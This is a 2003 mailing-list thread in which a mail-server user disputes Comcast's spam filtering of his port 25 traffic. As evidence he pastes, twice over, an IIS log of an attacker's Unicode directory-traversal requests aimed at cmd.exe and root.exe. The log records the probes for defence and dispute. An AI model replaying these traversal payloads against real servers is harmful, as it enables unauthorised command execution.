I need to have a more specific definition of SPAM. To me SPAM is defined as bouncing email off of open relays, and for that reason, the source server can not be identified. UCE on the other hand, uses mail servers that identify were the email is coming from. We all know the negative impact SPAMMING and UCE have on the organizations in terms of illegal threats, relentless hackers, faxes and threatening phone calls.
DGo Pro's policy is to send all bulk email on a 100 % permission basis. ALL remove requests are honored within a reasonable amount of time (ASAP). Most importantly, SPAM and UCE have a reverse effect. If someone sends bulk email for promotional purposes to thoose that have not solicited it, the email negatively impacts the desired result. Instead of more sales of IMS software, for example, less sales result.
When UCE and SPAMMING become illegal, and someone starts pointing at a SPAMMER, we need to have a process to identify the SPAMMER. For example, check out the following IIS log showing a UNICODE hack into my IMS dev. server:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-10-11 14:30:24
#Fields: time c-ip cs-method cs-uri-stem sc-status
15:18:12 66.176.103.202 GET /scripts/root.exe 404
15:18:13 66.176.103.202 GET /MSADC/root.exe 404
15:18:16 66.176.103.202 GET /c/winnt/system32/cmd.exe 404
15:18:18 66.176.103.202 GET /d/winnt/system32/cmd.exe 404
15:18:20 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:22 66.176.103.202 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
15:18:23 66.176.103.202 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
15:18:25 66.176.103.202 GET /msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe 500
15:18:27 66.176.103.202 GET /scripts/..� ../winnt/system32/cmd.exe 500
15:18:29 66.176.103.202 GET /scripts/winnt/system32/cmd.exe 404
15:18:30 66.176.103.202 GET /winnt/system32/cmd.exe 404
15:18:32 66.176.103.202 GET /winnt/system32/cmd.exe 404
15:18:34 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:36 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:38 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:39 66.176.103.202 GET /scripts/..%2f../winnt/system32/cmd.exe 500
#Version: 1.0
#Date: 2003-10-11 14:30:24
#Fields: time c-ip cs-method cs-uri-stem sc-status
15:18:12 66.176.103.202 GET /scripts/root.exe 404
15:18:13 66.176.103.202 GET /MSADC/root.exe 404
15:18:16 66.176.103.202 GET /c/winnt/system32/cmd.exe 404
15:18:18 66.176.103.202 GET /d/winnt/system32/cmd.exe 404
15:18:20 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:22 66.176.103.202 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
15:18:23 66.176.103.202 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
15:18:25 66.176.103.202 GET /msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe 500
15:18:27 66.176.103.202 GET /scripts/..� ../winnt/system32/cmd.exe 500
15:18:29 66.176.103.202 GET /scripts/winnt/system32/cmd.exe 404
15:18:30 66.176.103.202 GET /winnt/system32/cmd.exe 404
15:18:32 66.176.103.202 GET /winnt/system32/cmd.exe 404
15:18:34 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:36 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:38 66.176.103.202 GET /scripts/..%5c../winnt/system32/cmd.exe 500
15:18:39 66.176.103.202 GET /scripts/..%2f../winnt/system32/cmd.exe 500
As quoted from "Hacking Exposed" third edition, "an attacker can escape the web root, and execute any command..... " If anyone wants the counter measure, email me offline.
The point here is that 66.176.103.202 (if they are hacking, I would guess they are SPAMMERS ALSO ) could have used my machine to SPAM.
If someone is going to say I am a SPAMMER (not saying that you are) , I would appreciate the opportunity to defend myself. If Comcast has placed this filter on my IMS dev. machines because someone says I am a SPAMMER, the ethical thing to do is to investigate the incident first, then take appropriate filter action. Comcast has not contacted me before placing the filter on Sunday.
Regards,
DGo Pro & Consult
Howie Hamlin <[EMAIL PROTECTED]> wrote:
Many ISPs are blocking SMTP traffic except to their mail servers to prevent clients from SPAMMING. If that is what they are doing then the only thing you can do is ask them if there is any way to change that.Regards,Howie----- Original Message -----From: D Go 877-485-4076Sent: Wednesday, October 22, 2003 2:39 PMSubject: Re: [iMS] POST ProblemsMy development servers are using a static Comcast home ip. It appears that they put a filter for traffic on port 25 to their servers and any other mx on the Internet. They did this on Sunday night. The filter makes connections time out based on certain criteria. For example, if IMS connects to more than one server per hour and it blocks the email.My questions are ... how can I find out what program is doing this to IMS ? Why have they done this to my IMS dev. servers ? Can IMS be setup as an application that does this?Cheers to all,David A. Goldfield
This list server is Powered by iMS "The Swiss Army Knife of Mail Servers"
This list is provided as a free service. Although we will try to address issues in a timely manner, support via this list is not guaranteed. If you require expedited support then a support contract is required. Support may be purchased from http://www.coolfusion.com/commerce. Details regarding support options may be reviewed at: http://www.coolfusion.com/SupportOptions.cfm.
To leave this list please complete the form at http://www.coolfusion.com/Support/
Need an iMS Developer license? Sign up for a free license here: http://www.coolfusion.com/Developers/
List archives: http://www.mail-archive.com/infusion-email%40eoscape.com/
Note: You are subscribed as [EMAIL PROTECTED]
